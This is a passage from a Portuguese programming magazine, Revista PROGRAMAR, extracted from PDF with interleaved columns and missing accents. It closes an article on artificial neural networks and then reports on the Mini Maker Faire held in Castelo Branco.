Breast Cancer, baseado nas regras de associao e em uma
Reconhecimento de voz; RNA multilayer perceptron.
Software de OCR; Espero que nestas poucas pginas eu tenha
conseguido instigar a sua curiosidade sobre as RNAs. Caso
Identificao de spam; voc queira se aventurar neste mundo de IA, pense que as
Cloud computing; RNA so um modelo matemtico que se apropria de padres
biolgicos para desenvolver um sistema computacional capaz
Mercado financeiro; de evoluir por meio de treinamento.

Agricultura; Sendo assim, voc vai precisar estudar muita

matemtica para desenvolver seus algoritmos, praticar a
Previso do tempo; observao da natureza para elaborar seus modelos
matemticos, e ter muita pacincia para testar seu algoritmo
Medicina. e sua arquitetura.
Para se ter uma ideia do uso das RNAs na medicina, No se esquea: a tecnologia apenas um meio para
um fim. Saiba o que fazer com ela!

AUTOR
Escrito por Alex Lattaro

Lder de Contedo do iMasters

alex.lattro@imasters.com.br

61
No Code
Mini Maker Faire Castelo Branco
Decorreu no passado dia 10 de Junho a Mini Maker
Faire em Castelo Branco. Correndo o risco de ser suspeita,
uma vez que Castelo Branco ser sempre a minha cidade de
eleio, com orgulho que vos digo que este foi um evento
que decorreu com todo o sucesso esperado. A PROGRA-
MAR como Media Partner do Evento, esteve no local, e pos-
so dizer-vos que nesse dia, todos os caminhos iam ter Mini
Maker Faire.
Organizado pela AICB, a Associao de Informtica
de Castelo Branco, este evento teve a participao de vrios
makers e de mais de duas centenas de pessoas estiveram
presentes.
Para os leitores que no esto to familizarizados
com este tema, uma Mini Maker Faire uma feira onde o
movimento Maker promovido. uma oportunidade dos
criadores e envolvidos mostrarem os seus projectos comu-
nidade, onde demonstrada a criatividade e capacidade de
AUTOR
Escrito por Rita Peres
Natural de Castelo Branco, licenciou-se em Engenharia Informtica pela Universidade da Beira Interior.
Membro do P@P desde Janeiro de 2010. Embaixadora das Geek Girls Portugal Ncleo de Lisboa.
62
inveno dos participantes. Acima de tudo, um evento que
promove a partilha de conhecimento e pretende alargar os
horizontes do imaginrio dos participantes, uma vez que pos-
sibilita a partilha de ideias e conhecimento acerca de tecnolo-
gia.
Ser um maker, est ao alcance de qualquer um que
se interesse pelo tema, sem limite de idade para aprender.
Alis foram vrias as famlias que se dirigiram ao evento,
sendo que midos e grados se encantaram com algumas
das criaes presentes na feira. Para permitir uma maior
aprendizagem, os workshops tambm no foram esquecidos
e vrios foram os participantes atentos.
Desde impressoras 3D, a jogos de Arcada, ao Arduino
e a pequenas actividades para crianas, o evento no desilu-
diu as espectativas, e julgamos que inspirou os mais peque-
nos a explorar, a querer saber mais e lhes fomentou a imagi-
nao do que poderiam criar.
importante referir que no interior do nosso pas, nem
sempre existem muitas possibilidades deste tipo de partilha,
pelo que queremos deixar o nosso agradecimento e o nosso
apoio organizao do evento pois so de facto os peque-
nos gestos que fazem a diferena. Esperamos pela prxima
edio!
Veja tambm as edies anteriores da

54 Edio - Janeiro 2017 51 Edio - Dezemb ro 2015

Revista PROGRAMAR

e muito mais em
55 Edio - Maro 2017 52 Edio - Maro 2016
56 Edio - Maio 2017 53 Edio - Agosto 2016